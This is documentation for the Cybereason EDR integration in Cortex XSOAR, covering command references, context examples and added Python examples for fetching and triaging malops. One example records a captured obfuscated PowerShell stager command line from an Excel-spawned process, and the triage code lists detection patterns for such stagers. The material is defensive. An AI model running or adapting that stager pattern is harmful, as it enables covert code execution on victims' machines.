Cybereason
This Integration is part of the Cybereason Pack.
Cybereason is an endpoint detection and response platform used through Cortex XSOAR to manage and query malops, connections, and processes.
This integration was integrated and tested with Cybereason v17.5.20.
Important Notes
- The integration supports both basic and client-certificate authentication.
- Decrypt the certificate .pfx file outside of Cortex XSOAR.
- Insert the decrypted certificate in the Certificate field under the Credentials tab, according to the following template. The decrypted material contains the unencrypted private key, so treat the Certificate field (and the intermediate file on your workstation) as a secret and delete the file once the instance is configured.
- If you plan to fetch incidents, read the important notes in the Fetched Incidents Data section.

```
Bag Attributes
<ATTRIBUTES>
-----BEGIN CERTIFICATE-----
<CERTIFICATE>
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
<KEY>
-----END RSA PRIVATE KEY-----
```
Configure Cybereason on Cortex XSOAR
- Navigate to Settings > Integrations > Servers & Services.
- Search for Cybereason.
- Click Add instance to create and configure a new integration instance.
  - Name: a textual name for the integration instance.
  - Server URL (e.g. https://192.168.0.1)
  - Credentials
  - Trust any certificate (not secure): disables TLS certificate verification for the Cybereason server, which exposes the credentials and API traffic to interception. Leave it unchecked and add the server's issuing CA to the trust store instead if the server does not present a publicly trusted certificate.
  - Use system proxy settings
  - Fetch incidents
  - Incident type
- Click Test to validate the URLs, token, and connection.
Fetched Incidents Data
Cortex XSOAR fetches the first batch of Cybereason malops from the previous three days.
After the first batch of fetched malops, Cortex XSOAR fetches new Cybereason malops as soon as they are generated in Cybereason.
IMPORTANT: In order to properly fetch incidents, you need to create a pre-process rule for each incident type. The rule should include the SourceBrand (Cybereason) and the incident Type (Malware, Phishing, etc.). Choose Run a script for the action, and choose the CybereasonPreProcessing script.
(Screenshot: Pre-Process Rule for Malware Indicator Type)
(Screenshot: Integration Instance Configuration)
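As an added example, not code from the integration or from this page, the fetch cycle described above (a three-day initial lookback, then only malops newer than the previous fetch) can be modelled as follows. It assumes malop records shaped like the cybereason-query-malops context example further down and a hypothetical last_run dictionary standing in for demisto.getLastRun()/demisto.setLastRun(); the sample malops, their GUIDs and timestamps are constructed.

```python
# Added example: fetch-incidents bookkeeping for Cybereason malops.
# Not the integration's own code. Records follow the shape of the
# cybereason-query-malops context output on this page; the last_run dict
# stands in for demisto.getLastRun()/demisto.setLastRun().
import json
from datetime import datetime, timedelta, timezone

INITIAL_LOOKBACK = timedelta(days=3)      # first batch covers the previous three days
TS_FMT = "%Y-%m-%dT%H:%M:%S"              # timestamp format used in the context examples


def parse_ts(value):
    """Parse a Cybereason context timestamp as UTC."""
    return datetime.strptime(value, TS_FMT).replace(tzinfo=timezone.utc)


def malop_to_incident(malop):
    """Map one malop record to an XSOAR incident dict.

    The pre-process rule described above keys on the incident's source brand
    and type, so the raw malop is kept in rawJSON for the script to inspect.
    """
    return {
        "name": "Cybereason Malop {} ({})".format(
            malop["GUID"], malop.get("DecisionFailure", "unknown")),
        "occurred": malop["CreationTime"] + "Z",
        "dbotMirrorId": malop["GUID"],        # stable id, useful for dedup downstream
        "rawJSON": json.dumps(malop),
    }


def fetch_incidents(last_run, malops, now):
    """Return (next_run, incidents) for one fetch cycle.

    last_run: {} on the first run, otherwise the dict returned last time:
      {"last_update": "<TS_FMT>", "seen_guids": [GUIDs updated at last_update]}
    seen_guids makes the >= comparison on LastUpdateTime safe: malops already
    ingested at the boundary second are not fetched twice, while a malop that
    lands in that same second after the previous fetch still is.
    """
    if last_run.get("last_update"):
        since = parse_ts(last_run["last_update"])
    else:
        since = now - INITIAL_LOOKBACK
    already_seen = set(last_run.get("seen_guids", []))

    incidents = []
    newest = since
    newest_guids = set(already_seen)
    for malop in malops:
        updated = parse_ts(malop["LastUpdateTime"])
        if updated < since or malop["GUID"] in already_seen:
            continue
        incidents.append(malop_to_incident(malop))
        if updated > newest:
            newest, newest_guids = updated, {malop["GUID"]}
        elif updated == newest:
            newest_guids.add(malop["GUID"])

    next_run = {"last_update": newest.strftime(TS_FMT),
                "seen_guids": sorted(newest_guids)}
    return next_run, incidents


# Constructed sample data: the first record mirrors the context example on this
# page, the others are invented to exercise the three-day window.
NOW = datetime(2018, 5, 1, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_MALOPS = [
    {"GUID": "11.8371241992421952627", "CreationTime": "2018-04-30T14:05:14",
     "LastUpdateTime": "2018-04-30T14:07:29",
     "DecisionFailure": "maliciousExecutionOfPowerShell",
     "Suspects": "Process: powershell.exe"},
    {"GUID": "11.1000000000000000001", "CreationTime": "2018-04-29T08:00:00",
     "LastUpdateTime": "2018-04-29T08:30:00",
     "DecisionFailure": "constructedSampleA", "Suspects": "Process: sample.exe"},
    {"GUID": "11.1000000000000000002", "CreationTime": "2018-04-20T01:00:00",
     "LastUpdateTime": "2018-04-20T01:10:00",   # older than three days: skipped on first run
     "DecisionFailure": "constructedSampleB", "Suspects": "Process: old.exe"},
]
# A constructed malop that appears after the first fetch.
NEW_MALOP = {"GUID": "11.1000000000000000003", "CreationTime": "2018-05-01T09:00:00",
             "LastUpdateTime": "2018-05-01T09:05:00",
             "DecisionFailure": "constructedSampleC", "Suspects": "Process: new.exe"}

if __name__ == "__main__":
    run1, first = fetch_incidents({}, SAMPLE_MALOPS, NOW)
    print(len(first), "incidents on first run; next_run =", run1)
    run2, second = fetch_incidents(run1, SAMPLE_MALOPS + [NEW_MALOP], NOW)
    print(len(second), "incidents on second run; next_run =", run2)
```

The first call ingests the two malops inside the three-day window and records the newest LastUpdateTime; a repeat call with the same data ingests nothing, and only the later malop is picked up on the next cycle.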
Commands
You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.
- Search for processes: cybereason-query-processes
- Check connection to Cybereason server: cybereason-is-probe-connected
- Search for connections: cybereason-query-connections
- Isolate a machine from the network: cybereason-isolate-machine
- Take machine out of isolation: cybereason-unisolate-machine
- Get a list and details for all malops: cybereason-query-malops
- Get the processes involved in one or more malops: cybereason-malop-processes
- Add a comment to a malop: cybereason-add-comment
- Update malop status: cybereason-update-malop-status
- Prevent a malop process file: cybereason-prevent-file
- Allow a malop process file: cybereason-unprevent-file
- Get information for a file: cybereason-query-file
- Get information for a domain: cybereason-query-domain
- Get information for a user: cybereason-query-user
1. Search for processes
Searches for processes with various filters.
Base Command
cybereason-query-processes
Input
Argument Name | Description | Required |
---|---|---|
machine | Machine hostname | Optional |
onlySuspicious | Show only suspicious processes | Optional |
limit | Maximum number of results to retrieve | Optional |
processName | Process name to filter by | Optional |
saveToContext | If true, save the result to the context | Optional |
hasIncomingConnection | Filter only processes with incoming connections | Optional |
hasOutgoingConnection | Filter only processes with outgoing connections | Optional |
Context Output
Path | Description |
---|---|
Process.Name | The process name |
Process.Malicious | Malicious status of the process |
Process.CreationTime | Process creation time |
Process.EndTime | Process end time |
Process.CommandLine | Command line of the process |
Process.SignedAndVerified | Is the process signed and verified |
Process.ProductType | Product type |
Process.Children | Children of the process |
Process.Parent | Parent process |
Process.OwnerMachine | Machine hostname |
Process.User | The user who ran the process |
Process.ImageFile | Image file of the process |
Process.SHA1 | SHA-1 of the process file |
Process.MD5 | MD5 of the process file |
Process.CompanyName | Company name |
Process.ProductName | Product name |
Command Example
!cybereason-query-processes machine=DESKTOP-VUO0QPN hasOutgoingConnection=true hasIncomingConnection=true
Context Example
{ "Process": [ { "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService", "CompanyName": "Microsoft Corporation", "CreationTime": "2018-08-06T23:46:30", "EndTime": "2018-08-06T23:45:11", "ImageFile": "svchost.exe", "MD5": "32569e403279b3fd2edb7ebd036273fa", "Malicious": "indifferent", "Name": "svchost.exe", "OwnerMachine": "DESKTOP-VUO0QPN", "Parent": "services.exe", "ProductName": "Microsoft® Windows® Operating System", "ProductType": "SVCHOST", "SHA1": "660b76b6fb802417d513adc967c5caf77fc2bac6", "SignedandVerified": "true", "User": "desktop-vuo0qpn\\local service" } ] }
Human Readable Output
Cybereason Processes
Name | Malicious | Creation Time | End Time | Command Line | Signed and Verified | Product Type | Children | Parent | Owner Machine | User | Image File | SHA1 | MD5 | Company Name | Product Name |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
svchost.exe | indifferent | 2018-08-06T23:46:30 | 2018-08-06T23:45:11 | C:\Windows\system32\svchost.exe -k LocalService | true | SVCHOST | | services.exe | DESKTOP-VUO0QPN | desktop-vuo0qpn\local service | svchost.exe | 660b76b6fb802417d513adc967c5caf77fc2bac6 | 32569e403279b3fd2edb7ebd036273fa | Microsoft Corporation | Microsoft® Windows® Operating System |
2. Check connection to Cybereason server
Checks if the machine is currently connected to the Cybereason server.
Base Command
cybereason-is-probe-connected
Input
Argument Name | Description | Required |
---|---|---|
machine | Hostname of the machine to check | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Machine.isConnected | boolean | true if machine is connected, false if machine is not connected |
Cybereason.Machine.Name | string | Machine name |
Command Example
!cybereason-is-probe-connected machine=DESKTOP-VUO0QPN
Context Example
{ "Cybereason": { "Machine": { "Name": "DESKTOP-VUO0QPN", "isConnected": true } } }
Human Readable Output
true
3. Search for connections
Searches for connections.
Base Command
cybereason-query-connections
Input
Argument Name | Description | Required |
---|---|---|
ip | Filter connections that contain this IP (in or out) | Optional |
machine | Filter connections on the specified machine | Optional |
saveToContext | If true, save the result to the context | Optional |
Context Output
Path | Description |
---|---|
Connection.Name | Connection name |
Connection.Direction | OUTGOING/INCOMING |
Connection.ServerAddress | Address of the server side of the connection (the remote host for an OUTGOING connection) |
Connection.ServerPort | Port on the server side of the connection |
Connection.PortType | Connection type |
Connection.ReceivedBytes | Received bytes count |
Connection.TransmittedBytes | Transmitted bytes count |
Connection.RemoteCountry | Connection's remote country |
Connection.OwnerMachine | Machine hostname |
Connection.OwnerProcess | The process that performed the connection |
Connection.CreationTime | Connection creation time |
Connection.EndTime | Connection end time |
Command Example
!cybereason-query-connections ip=192.168.39.128
Context Example
{ "Connection": [ { "CreationTime": "2018-04-30T18:12:28", "Direction": "OUTGOING", "Name": "172.16.3.7:48300 \u003e 54.235.96.83:8443", "OwnerMachine": "ip-172-16-3-7.ec2.internal", "OwnerProcess": "cybereason-sens", "RemoteCountry": "United States", "ServerAddress": "54.235.96.83", "ServerPort": "8443" } ] }
Human Readable Output
Cybereason Connections
Name | Direction | Server Address | Server Port | Port Type | Received Bytes | Transmitted Bytes | Remote Country | Owner Machine | Owner Process | Creation Time | End Time |
---|---|---|---|---|---|---|---|---|---|---|---|
172.16.3.7:48300 > 54.235.96.83:8443 | OUTGOING | 54.235.96.83 | 8443 | | | | United States | ip-172-16-3-7.ec2.internal | cybereason-sens | 2018-04-30T18:12:28 | |
4. Isolate machine from the network
Isolates a machine that has been infected from the rest of the network. Confirm the sensor is online with cybereason-is-probe-connected before isolating, because isolation is enforced by the Cybereason sensor on the endpoint, not at the network layer.
Base Command
cybereason-isolate-machine
Input
Argument Name | Description | Required |
---|---|---|
machine | Machine name to be isolated | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Machine | string | Machine name |
Cybereason.IsIsolated | boolean | Is the machine isolated |
Endpoint.Hostname | string | Machine name |
Command Example
!cybereason-isolate-machine machine=DESKTOP-VUO0QPN
Context Example
{ "Cybereason": { "IsIsolated": true, "Machine": "DESKTOP-VUO0QPN" }, "Endpoint": { "Hostname": "DESKTOP-VUO0QPN" } }
Human Readable Output
Machine was isolated successfully.
5. Take machine out of isolation
Returns a machine that was isolated from the network.
Base Command
cybereason-unisolate-machine
Input
Argument Name | Description | Required |
---|---|---|
machine | Name of machine to take out of isolation | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Machine | string | Machine name |
Cybereason.IsIsolated | boolean | Is the machine isolated |
Endpoint.Hostname | string | Machine name |
Command Example
!cybereason-unisolate-machine machine=DESKTOP-VUO0QPN raw-response=true
Context Example
{ "Cybereason": { "IsIsolated": false, "Machine": "DESKTOP-VUO0QPN" }, "Endpoint": { "Hostname": "DESKTOP-VUO0QPN" } }
Human Readable Output
Machine was un-isolated successfully.
6. Get a list and details for all malops
Returns a list and details of all malops.
Base Command
cybereason-query-malops
Input
Argument Name | Description | Required |
---|---|---|
filters | The filters to filter the response by (given in Cybereason API syntax) | Optional |
totalResultLimit | The total number of results to return for your server. To reduce system overload and maximize server performance, make sure the limit is a reasonable number. | Optional |
perGroupLimit | The number of items to return for each malop group | Optional |
templateContext | The level of detail to provide in the response. Possible values include: | Optional |
withinLastDays | Return all the malops within the last days | Optional |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Malops.GUID | string | Malop GUID |
Cybereason.Malops.CreationTime | string | The time reported as when the malicious behavior began on the system. This is not the time the malop was first detected by Cybereason. |
Cybereason.Malops.DecisionFeature | string | The reason that Cybereason raised the malop |
Cybereason.Malops.Link | string | Link to the malop on Cybereason |
Cybereason.Malops.Suspects | string | Malop suspect type and name |
Cybereason.Malops.LastUpdatedTime | string | Last updated time of malop |
Cybereason.Malops.AffectedMachine | string | List of machines affected by this malop |
Cybereason.Malops.InvolvedHash | string | List of file hashes involved in this malop |
Command Example
!cybereason-query-malops
Context Example
{ "Cybereason": { "Malops" : [ { "CreationTime": "2018-04-30T14:05:14", "DecisionFailure": "maliciousExecutionOfPowerShell", "GUID": "11.8371241992421952627", "LastUpdateTime": "2018-04-30T14:07:29", "Link": "https://integration.cybereason.net:8443/#/malop/11.8371241992421952627", "Suspects": "Process: powershell.exe" } ] } }
Human Readable Output
Cybereason Malops
GUID | Link | CreationTime | LastUpdateTime | DecisionFailure | Suspects |
---|---|---|---|---|---|
11.8371241992421952627 | https://integration.cybereason.net:8443/#/malop/11.8371241992421952627 | 2018-04-30T14:05:14 | 2018-04-30T14:07:29 | maliciousExecutionOfPowerShell | Process: powershell.exe |
7. Get the processes of a malop
Returns the processes involved in the specified malops (the Process context entries shown in this section), not the malop list itself; use cybereason-query-malops for that.
Base Command
cybereason-malop-processes
Input
Argument Name | Description | Required |
---|---|---|
malopGuids | Array of malop GUIDs (comma-separated). Retrieve the malop GUID using the cybereason-query-malops command. | Required |
machinename | A CSV list of machine names affected by malops, for example, "machine1,machine2" | Optional |
Context Output
Path | Type | Description |
---|---|---|
Process.Name | string | Process name |
Process.Malicious | unknown | Malicious status of the process |
Process.CreationTime | date | Process creation time |
Process.EndTime | date | Process end time |
Process.CommandLine | string | The command line of the process |
Process.SignedAndVerified | unknown | Is the process signed and verified |
Process.ProductType | unknown | Product type |
Process.Children | unknown | Children of the process |
Process.Parent | unknown | Parent process |
Process.OwnerMachine | unknown | Machine hostname |
Process.User | string | The user who ran the process |
Process.ImageFile | unknown | Image file of the process |
Process.SHA1 | string | SHA-1 of the process file |
Process.MD5 | string | MD5 of the process file |
Process.CompanyName | string | Company name |
Process.ProductName | string | Product name |
Command Example
!cybereason-malop-processes malopGuids=11.8371241992421952627
Context Example
{ "Process": [ { "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"", "CompanyName": "Microsoft Corporation", "CreationTime": "2018-04-30T14:05:49", "EndTime": "2018-04-30T14:06:22", "ImageFile": "powershell.exe", "MD5": "92f44e405db16ac55d97e3bfe3b132fa", "Malicious": "indifferent", "Name": "powershell.exe", "OwnerMachine": "ROBERTE-EXCASST", "Parent": "excel.exe", "ProductName": "Microsoft® Windows® Operating System", "SHA1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", "User": "darkcap\\roberte" } ] }
Human Readable Output
Cybereason Malop Processes
Name | Malicious | Creation Time | End Time | Command Line | Parent | Owner Machine | User | Image File | SHA1 | MD5 | Company Name | Product Name |
---|---|---|---|---|---|---|---|---|---|---|---|---|
powershell.exe | indifferent | 2018-04-30T14:05:49 | 2018-04-30T14:06:22 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" | excel.exe | ROBERTE-EXCASST | darkcap\roberte | powershell.exe | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d | 92f44e405db16ac55d97e3bfe3b132fa | Microsoft Corporation | Microsoft® Windows® Operating System |
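The process above is a textbook PowerShell stager (hidden window, execution-policy bypass, base64 plus Deflate decoded in memory and handed to Invoke-Expression, spawned by excel.exe), yet Cybereason's Malicious field reports it as "indifferent", exactly as it does for the svchost.exe process in the cybereason-query-processes example. The following added example, which is not part of the integration or this page, shows triage logic an automation could run over the Process context entries returned by cybereason-malop-processes or cybereason-query-processes. The rules, labels and thresholds are the editor's assumptions; the two sample records are constructed from the context examples on this page, and the base64 blob is a placeholder.

```python
# Added example: triage over Process context entries from
# cybereason-malop-processes / cybereason-query-processes. Not part of the
# integration; rules and thresholds are the editor's assumptions, samples are
# constructed from the context examples on this page.
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line traits typical of PowerShell stagers; each hit adds one finding.
POWERSHELL_FLAGS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("exec_bypass", re.compile(r"-e(?:p|xec|xecutionpolicy)?\s+bypass", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("encoded_payload", re.compile(
        r"FromBase64String|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("in_memory_decompress", re.compile(r"DeflateStream|GzipStream", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
]


def triage_process(proc):
    """Return {'name', 'owner_machine', 'findings', 'verdict'} for one Process record."""
    name = proc.get("Name", "").lower()
    parent = proc.get("Parent", "").lower()
    cmd = proc.get("CommandLine", "")
    findings = []
    if name in ("powershell.exe", "pwsh.exe"):
        findings += [label for label, rx in POWERSHELL_FLAGS if rx.search(cmd)]
    if parent in OFFICE_PARENTS and name in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    # The field is spelled both SignedAndVerified and SignedandVerified on this
    # page; only an explicit "false" counts, an absent field proves nothing.
    signed = str(proc.get("SignedAndVerified", proc.get("SignedandVerified", ""))).lower()
    if signed == "false":
        findings.append("unsigned_or_unverified")
    if len(findings) >= 4:
        verdict = "isolate"   # candidate for cybereason-isolate-machine, after analyst review
    elif findings:
        verdict = "review"
    else:
        verdict = "benign"
    return {"name": proc.get("Name", ""), "owner_machine": proc.get("OwnerMachine", ""),
            "findings": findings, "verdict": verdict}


def triage_all(processes):
    """Triage a Process context list, most suspicious first."""
    return sorted((triage_process(p) for p in processes),
                  key=lambda r: len(r["findings"]), reverse=True)


# Constructed samples mirroring the two context examples on this page.
SAMPLE_SVCHOST = {
    "Name": "svchost.exe", "Parent": "services.exe", "OwnerMachine": "DESKTOP-VUO0QPN",
    "User": "desktop-vuo0qpn\\local service", "Malicious": "indifferent",
    "SignedandVerified": "true",
    "CommandLine": "C:\\Windows\\system32\\svchost.exe -k LocalService",
}
SAMPLE_POWERSHELL = {
    "Name": "powershell.exe", "Parent": "excel.exe", "OwnerMachine": "ROBERTE-EXCASST",
    "User": "darkcap\\roberte", "Malicious": "indifferent",
    "CommandLine": (
        "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
        "-NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression "
        "$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
        "($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
        "'QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=')))), "   # placeholder blob, not real payload
        "[IO.Compression.CompressionMode]::Decompress)), "
        "[Text.Encoding]::ASCII)).ReadToEnd();\""
    ),
}

if __name__ == "__main__":
    for result in triage_all([SAMPLE_SVCHOST, SAMPLE_POWERSHELL]):
        print(result["owner_machine"], result["name"], result["verdict"], result["findings"])
```

The verdict is a prioritisation hint for an analyst, not an automatic trigger: the "isolate" label points at cybereason-isolate-machine for the OwnerMachine and cybereason-prevent-file for the MD5, both of which should still go through review before they run.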
8. Add a comment to a malop
Adds a new comment to a malop.
Base Command
cybereason-add-comment
Input
Argument Name | Description | Required |
---|---|---|
comment | Comment to add to the malop. | Required |
malopGuid | GUID of the malop to add the comment to. Retrieve the malop GUID using the cybereason-query-malops command. | Required |
Context Output
There is no context output for this command.
Command Example
!cybereason-add-comment comment=NewComment malopGuid=11.8371241992421952627
Human Readable Output
Comment added successfully
9. Update malop status
Updates a malop status.
Base Command
cybereason-update-malop-status
Input
Argument Name | Description | Required |
---|---|---|
malopGuid | GUID of the malop to update the status of | Required |
status | Status to update | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Malops.GUID | string | Malop GUID |
Cybereason.Malops.Status | string | Malop status: |
Command Example
!cybereason-update-malop-status malopGuid=11.8371241992421952627 status="To Review"
Context Example
{ "Cybereason": { "Malops": { "GUID": "11.8371241992421952627", "Status": "To Review" } } }
Human Readable Output
Successfully updated malop 11.8371241992421952627 to status To Review
10. Prevent a malop process file
Prevents the malop process file from running on the machine. Prevention is keyed on the file's MD5 hash, so any modified or repacked copy of the same malware has a different hash and is not blocked; treat it as a complement to isolation and remediation, not a substitute.
Base Command
cybereason-prevent-file
Input
Argument Name | Description | Required |
---|---|---|
hash | MD5 of the malop process file to prevent | Required |
Context Output
Path | Type | Description |
---|---|---|
Process.MD5 | string | Process file MD5 |
Process.Prevent | boolean | True if process file is prevented |
Command Example
!cybereason-prevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{ "Process": { "MD5": "6fb065fcff8d92da51bba667dc9f770c", "Prevent": true } }
Human Readable Output
File was prevented successfully.
11. Allow a malop process file
Allow a malop process file to run on the machine.
Base Command
cybereason-unprevent-file
Input
Argument Name | Description | Required |
---|---|---|
hash | MD5 of the malop process file to allow | Required |
Context Output
Path | Type | Description |
---|---|---|
Process.MD5 | string | Process file MD5 |
Process.Prevent | boolean | True if process file is prevented |
Command Example
!cybereason-unprevent-file hash=6fb065fcff8d92da51bba667dc9f770c
Context Example
{ "Process": { "MD5": "6fb065fcff8d92da51bba667dc9f770c", "Prevent": false } }
Human Readable Output
File was unprevented successfully.
12. Get information for a file
Query files as part of investigation.
Base Command
cybereason-query-file
Input
Argument Name | Description | Required |
---|---|---|
file_hash | File hash (SHA-1 and MD5 supported) | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.File.Path | string | File path |
Cybereason.File.SHA1 | string | File SHA-1 hash |
Cybereason.File.Machine | string | Machine name on which file is located |
Cybereason.File.SuspicionsCount | number | File suspicions count |
Cybereason.File.Name | string | File name |
Cybereason.File.CreationTime | date | File creation time |
Cybereason.File.Suspicion | string | Object mapping each suspicion name to the time it was detected |
Cybereason.File.OSVersion | string | Machine OS version on which the file is located |
Cybereason.File.ModifiedTime | date | File modified date |
Cybereason.File.Malicious | boolean | Is file malicious |
Cybereason.File.Company | string | Company name |
Cybereason.File.MD5 | string | File MD5 hash |
Cybereason.File.IsConnected | boolean | Is machine connected to Cybereason |
Cybereason.File.Signed | boolean | Is file signed |
Cybereason.File.Evidence | string | List of evidence names attached to the file |
Endpoint.Hostname | string | Hostname on which file is located |
Endpoint.OSVersion | string | Machine OS version on which the file is located |
File.Hostname | string | Hostname on which file is located |
File.MD5 | string | File MD5 hash |
File.SHA1 | string | File SHA-1 hash |
File.Name | string | File name |
File.Path | string | File path |
Command Example
!cybereason-query-file file_hash=d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f
Context Example
{ "Cybereason": { "File": [ { "Company": "company", "CreationTime": "2018-09-25T20:10:38.000Z", "Evidence": [ "mimikatzResourceEvidence", "reportedByAntiMalwareEvidence", "malwareClassificationEvidence", "hasLegitClassificationEvidence", "hasNonLegitClassificationEvidence", "whitelistClassificationEvidence" ], "IsConnected": false, "MD5": "b5962945811f8d275a3a69334dbc81e8", "Machine": "DESKTOP-UNQ8LCD", "Malicious": false, "ModifiedTime": "2018-11-14T20:02:34.000Z", "Name": "mimikatz.exe", "OSVersion": "Windows_10", "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f", "Signed": true, "Suspicion": { "fileReputationSuspicion": "2018-11-14T20:02:52.000Z", "mimikatzSuspicion": "2018-11-14T20:02:52.000Z", "reportedByAntiMalwareSuspicion": "2018-11-27T20:56:54.000Z" }, "SuspicionsCount": 3 } ] }, "Endpoint": [ { "Hostname": "DESKTOP-UNQ8LCD", "OSVersion": "Windows_10" } ], "File": [ { "Hostname": "DESKTOP-UNQ8LCD", "MD5": "b5962945811f8d275a3a69334dbc81e8", "Name": "mimikatz.exe", "Path": "c:\\users\\user\\downloads\\mimikatz_trunk\\x64\\mimikatz.exe", "SHA1": "d40a48094c1f21fef892f27a8b6a7ed2bbf0c27f" } ] }
Human Readable Output
13. Get information for a domain
Query domains as part of investigation.
Base Command
cybereason-query-domain
Input
Argument Name | Description | Required |
---|---|---|
domain | Domain to query | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.Domain.Name | string | Domain name |
Cybereason.Domain.Malicious | boolean | Is domain malicious |
Cybereason.Domain.IsInternalDomain | boolean | Is domain internal |
Cybereason.Domain.Reputation | string | Domain reputation |
Cybereason.Domain.SuspicionsCount | number | Domain suspicions count |
Cybereason.Domain.WasEverResolved | boolean | Was domain ever resolved |
Cybereason.Domain.WasEverResolvedAsASecondLevelDomain | boolean | Was domain ever resolved as a second-level domain |
Domain.Name | string | Domain name |
Command Example
!cybereason-query-domain domain=www2.bing.com
Context Example
{ "Cybereason": { "Domain": [ { "IsInternalDomain": false, "Malicious": false, "Name": "www2.bing.com", "Reputation": "indifferent", "SuspicionsCount": 0, "WasEverResolved": true, "WasEverResolvedAsASecondLevelDomain": true } ] }, "Domain": [ { "Name": "www2.bing.com" } ] }
Human Readable Output
14. Get information for a user
Query users as part of investigation.
Base Command
cybereason-query-user
Input
Argument Name | Description | Required |
---|---|---|
username | Username to query | Required |
Context Output
Path | Type | Description |
---|---|---|
Cybereason.User.Username | string | User name |
Cybereason.User.Domain | string | User domain |
Cybereason.User.LastMachineLoggedInTo | string | Last machine the user logged in to |
Cybereason.User.LocalSystem | boolean | Is local system |
Cybereason.User.Organization | string | User organization |
Command Example
!cybereason-query-user username="ec2amaz-5man2hc\\network service"
Context Example
{ "Cybereason": { "User": [ { "Domain": "ec2amaz-5man2hc", "LastMachineLoggedInTo": "EC2AMAZ-5MAN2HC", "LocalSystem": true, "Organization": "INTEGRATION", "Username": "ec2amaz-5man2hc\\network service" } ] } }